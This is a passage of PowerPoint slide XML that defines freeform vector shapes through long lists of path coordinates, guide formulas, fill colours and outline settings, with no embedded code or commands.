                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36359" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3141" y="3194"/>
                <a:ext cx="123" cy="116"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 123"/>
                  <a:gd name="T1" fmla="*/ 2 h 116"/>
                  <a:gd name="T2" fmla="*/ 82 w 123"/>
                  <a:gd name="T3" fmla="*/ 7 h 116"/>
                  <a:gd name="T4" fmla="*/ 96 w 123"/>
                  <a:gd name="T5" fmla="*/ 9 h 116"/>
                  <a:gd name="T6" fmla="*/ 113 w 123"/>
                  <a:gd name="T7" fmla="*/ 15 h 116"/>
                  <a:gd name="T8" fmla="*/ 119 w 123"/>
                  <a:gd name="T9" fmla="*/ 19 h 116"/>
                  <a:gd name="T10" fmla="*/ 121 w 123"/>
                  <a:gd name="T11" fmla="*/ 31 h 116"/>
                  <a:gd name="T12" fmla="*/ 122 w 123"/>
                  <a:gd name="T13" fmla="*/ 46 h 116"/>
                  <a:gd name="T14" fmla="*/ 118 w 123"/>
                  <a:gd name="T15" fmla="*/ 53 h 116"/>
                  <a:gd name="T16" fmla="*/ 118 w 123"/>
                  <a:gd name="T17" fmla="*/ 59 h 116"/>
                  <a:gd name="T18" fmla="*/ 123 w 123"/>
                  <a:gd name="T19" fmla="*/ 72 h 116"/>
                  <a:gd name="T20" fmla="*/ 120 w 123"/>
                  <a:gd name="T21" fmla="*/ 77 h 116"/>
                  <a:gd name="T22" fmla="*/ 113 w 123"/>
                  <a:gd name="T23" fmla="*/ 86 h 116"/>
                  <a:gd name="T24" fmla="*/ 113 w 123"/>
                  <a:gd name="T25" fmla="*/ 95 h 116"/>
                  <a:gd name="T26" fmla="*/ 101 w 123"/>
                  <a:gd name="T27" fmla="*/ 110 h 116"/>
                  <a:gd name="T28" fmla="*/ 94 w 123"/>
                  <a:gd name="T29" fmla="*/ 116 h 116"/>
                  <a:gd name="T30" fmla="*/ 88 w 123"/>
                  <a:gd name="T31" fmla="*/ 114 h 116"/>
                  <a:gd name="T32" fmla="*/ 81 w 123"/>
                  <a:gd name="T33" fmla="*/ 115 h 116"/>
                  <a:gd name="T34" fmla="*/ 72 w 123"/>
                  <a:gd name="T35" fmla="*/ 112 h 116"/>
                  <a:gd name="T36" fmla="*/ 62 w 123"/>
                  <a:gd name="T37" fmla="*/ 110 h 116"/>
                  <a:gd name="T38" fmla="*/ 60 w 123"/>
                  <a:gd name="T39" fmla="*/ 109 h 116"/>
                  <a:gd name="T40" fmla="*/ 55 w 123"/>
                  <a:gd name="T41" fmla="*/ 103 h 116"/>
                  <a:gd name="T42" fmla="*/ 44 w 123"/>
                  <a:gd name="T43" fmla="*/ 101 h 116"/>
                  <a:gd name="T44" fmla="*/ 38 w 123"/>
                  <a:gd name="T45" fmla="*/ 93 h 116"/>
                  <a:gd name="T46" fmla="*/ 37 w 123"/>
                  <a:gd name="T47" fmla="*/ 84 h 116"/>
                  <a:gd name="T48" fmla="*/ 31 w 123"/>
                  <a:gd name="T49" fmla="*/ 83 h 116"/>
                  <a:gd name="T50" fmla="*/ 28 w 123"/>
                  <a:gd name="T51" fmla="*/ 80 h 116"/>
                  <a:gd name="T52" fmla="*/ 28 w 123"/>
                  <a:gd name="T53" fmla="*/ 75 h 116"/>
                  <a:gd name="T54" fmla="*/ 20 w 123"/>
                  <a:gd name="T55" fmla="*/ 71 h 116"/>
                  <a:gd name="T56" fmla="*/ 12 w 123"/>
                  <a:gd name="T57" fmla="*/ 65 h 116"/>
                  <a:gd name="T58" fmla="*/ 8 w 123"/>
                  <a:gd name="T59" fmla="*/ 53 h 116"/>
                  <a:gd name="T60" fmla="*/ 1 w 123"/>
                  <a:gd name="T61" fmla="*/ 45 h 116"/>
                  <a:gd name="T62" fmla="*/ 0 w 123"/>
                  <a:gd name="T63" fmla="*/ 40 h 116"/>
                  <a:gd name="T64" fmla="*/ 7 w 123"/>
                  <a:gd name="T65" fmla="*/ 41 h 116"/>
                  <a:gd name="T66" fmla="*/ 13 w 123"/>
                  <a:gd name="T67" fmla="*/ 38 h 116"/>
                  <a:gd name="T68" fmla="*/ 22 w 123"/>
                  <a:gd name="T69" fmla="*/ 42 h 116"/>
                  <a:gd name="T70" fmla="*/ 31 w 123"/>
                  <a:gd name="T71" fmla="*/ 34 h 116"/>
                  <a:gd name="T72" fmla="*/ 40 w 123"/>
                  <a:gd name="T73" fmla="*/ 22 h 116"/>
                  <a:gd name="T74" fmla="*/ 47 w 123"/>
                  <a:gd name="T75" fmla="*/ 18 h 116"/>
                  <a:gd name="T76" fmla="*/ 56 w 123"/>
                  <a:gd name="T77" fmla="*/ 16 h 116"/>
                  <a:gd name="T78" fmla="*/ 57 w 123"/>
                  <a:gd name="T79" fmla="*/ 10 h 116"/>
                  <a:gd name="T80" fmla="*/ 64 w 123"/>
                  <a:gd name="T81" fmla="*/ 2 h 116"/>
                  <a:gd name="T82" fmla="*/ 77 w 123"/>
                  <a:gd name="T83" fmla="*/ 0 h 11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123"/>
                  <a:gd name="T127" fmla="*/ 0 h 116"/>
                  <a:gd name="T128" fmla="*/ 123 w 123"/>
                  <a:gd name="T129" fmla="*/ 116 h 11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123" h="116">
                    <a:moveTo>
                      <a:pt x="80" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="80" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36360" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3054" y="3230"/>
                <a:ext cx="149" cy="157"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 83 w 149"/>
                  <a:gd name="T1" fmla="*/ 1 h 157"/>
                  <a:gd name="T2" fmla="*/ 85 w 149"/>
                  <a:gd name="T3" fmla="*/ 3 h 157"/>
                  <a:gd name="T4" fmla="*/ 87 w 149"/>
                  <a:gd name="T5" fmla="*/ 5 h 157"/>
                  <a:gd name="T6" fmla="*/ 91 w 149"/>
                  <a:gd name="T7" fmla="*/ 12 h 157"/>
                  <a:gd name="T8" fmla="*/ 97 w 149"/>
                  <a:gd name="T9" fmla="*/ 24 h 157"/>
                  <a:gd name="T10" fmla="*/ 103 w 149"/>
                  <a:gd name="T11" fmla="*/ 33 h 157"/>
                  <a:gd name="T12" fmla="*/ 111 w 149"/>
                  <a:gd name="T13" fmla="*/ 37 h 157"/>
                  <a:gd name="T14" fmla="*/ 116 w 149"/>
                  <a:gd name="T15" fmla="*/ 40 h 157"/>
                  <a:gd name="T16" fmla="*/ 116 w 149"/>
                  <a:gd name="T17" fmla="*/ 46 h 157"/>
                  <a:gd name="T18" fmla="*/ 123 w 149"/>
                  <a:gd name="T19" fmla="*/ 47 h 157"/>
                  <a:gd name="T20" fmla="*/ 124 w 149"/>
                  <a:gd name="T21" fmla="*/ 53 h 157"/>
                  <a:gd name="T22" fmla="*/ 129 w 149"/>
                  <a:gd name="T23" fmla="*/ 64 h 157"/>
                  <a:gd name="T24" fmla="*/ 138 w 149"/>
                  <a:gd name="T25" fmla="*/ 66 h 157"/>
                  <a:gd name="T26" fmla="*/ 145 w 149"/>
                  <a:gd name="T27" fmla="*/ 70 h 157"/>
                  <a:gd name="T28" fmla="*/ 149 w 149"/>
                  <a:gd name="T29" fmla="*/ 74 h 157"/>
                  <a:gd name="T30" fmla="*/ 144 w 149"/>
                  <a:gd name="T31" fmla="*/ 80 h 157"/>
                  <a:gd name="T32" fmla="*/ 135 w 149"/>
                  <a:gd name="T33" fmla="*/ 82 h 157"/>
                  <a:gd name="T34" fmla="*/ 128 w 149"/>
                  <a:gd name="T35" fmla="*/ 89 h 157"/>
                  <a:gd name="T36" fmla="*/ 121 w 149"/>
                  <a:gd name="T37" fmla="*/ 96 h 157"/>
                  <a:gd name="T38" fmla="*/ 113 w 149"/>
                  <a:gd name="T39" fmla="*/ 101 h 157"/>
                  <a:gd name="T40" fmla="*/ 111 w 149"/>
                  <a:gd name="T41" fmla="*/ 111 h 157"/>
                  <a:gd name="T42" fmla="*/ 104 w 149"/>
                  <a:gd name="T43" fmla="*/ 116 h 157"/>
                  <a:gd name="T44" fmla="*/ 95 w 149"/>
                  <a:gd name="T45" fmla="*/ 120 h 157"/>
                  <a:gd name="T46" fmla="*/ 91 w 149"/>
                  <a:gd name="T47" fmla="*/ 134 h 157"/>
                  <a:gd name="T48" fmla="*/ 88 w 149"/>
                  <a:gd name="T49" fmla="*/ 137 h 157"/>
                  <a:gd name="T50" fmla="*/ 81 w 149"/>
                  <a:gd name="T51" fmla="*/ 138 h 157"/>
                  <a:gd name="T52" fmla="*/ 73 w 149"/>
                  <a:gd name="T53" fmla="*/ 138 h 157"/>
                  <a:gd name="T54" fmla="*/ 62 w 149"/>
                  <a:gd name="T55" fmla="*/ 134 h 157"/>
                  <a:gd name="T56" fmla="*/ 52 w 149"/>
                  <a:gd name="T57" fmla="*/ 129 h 157"/>
                  <a:gd name="T58" fmla="*/ 49 w 149"/>
                  <a:gd name="T59" fmla="*/ 132 h 157"/>
                  <a:gd name="T60" fmla="*/ 42 w 149"/>
                  <a:gd name="T61" fmla="*/ 145 h 157"/>
                  <a:gd name="T62" fmla="*/ 32 w 149"/>
                  <a:gd name="T63" fmla="*/ 153 h 157"/>
                  <a:gd name="T64" fmla="*/ 21 w 149"/>
                  <a:gd name="T65" fmla="*/ 157 h 157"/>
                  <a:gd name="T66" fmla="*/ 12 w 149"/>
                  <a:gd name="T67" fmla="*/ 156 h 157"/>
                  <a:gd name="T68" fmla="*/ 11 w 149"/>
                  <a:gd name="T69" fmla="*/ 151 h 157"/>
                  <a:gd name="T70" fmla="*/ 14 w 149"/>
                  <a:gd name="T71" fmla="*/ 142 h 157"/>
                  <a:gd name="T72" fmla="*/ 9 w 149"/>
                  <a:gd name="T73" fmla="*/ 128 h 157"/>
                  <a:gd name="T74" fmla="*/ 0 w 149"/>
                  <a:gd name="T75" fmla="*/ 122 h 157"/>
                  <a:gd name="T76" fmla="*/ 0 w 149"/>
                  <a:gd name="T77" fmla="*/ 103 h 157"/>
                  <a:gd name="T78" fmla="*/ 0 w 149"/>
                  <a:gd name="T79" fmla="*/ 73 h 157"/>
                  <a:gd name="T80" fmla="*/ 13 w 149"/>
                  <a:gd name="T81" fmla="*/ 72 h 157"/>
                  <a:gd name="T82" fmla="*/ 17 w 149"/>
                  <a:gd name="T83" fmla="*/ 45 h 157"/>
                  <a:gd name="T84" fmla="*/ 17 w 149"/>
                  <a:gd name="T85" fmla="*/ 29 h 157"/>
                  <a:gd name="T86" fmla="*/ 17 w 149"/>
                  <a:gd name="T87" fmla="*/ 10 h 157"/>
                  <a:gd name="T88" fmla="*/ 47 w 149"/>
                  <a:gd name="T89" fmla="*/ 6 h 157"/>
                  <a:gd name="T90" fmla="*/ 59 w 149"/>
                  <a:gd name="T91" fmla="*/ 11 h 157"/>
                  <a:gd name="T92" fmla="*/ 68 w 149"/>
                  <a:gd name="T93" fmla="*/ 4 h 157"/>
                  <a:gd name="T94" fmla="*/ 76 w 149"/>
                  <a:gd name="T95" fmla="*/ 3 h 157"/>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49"/>
                  <a:gd name="T145" fmla="*/ 0 h 157"/>
                  <a:gd name="T146" fmla="*/ 149 w 149"/>
                  <a:gd name="T147" fmla="*/ 157 h 157"/>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49" h="157">
                    <a:moveTo>
                      <a:pt x="82" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="83" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="132"/>
                    </a:lnTo>
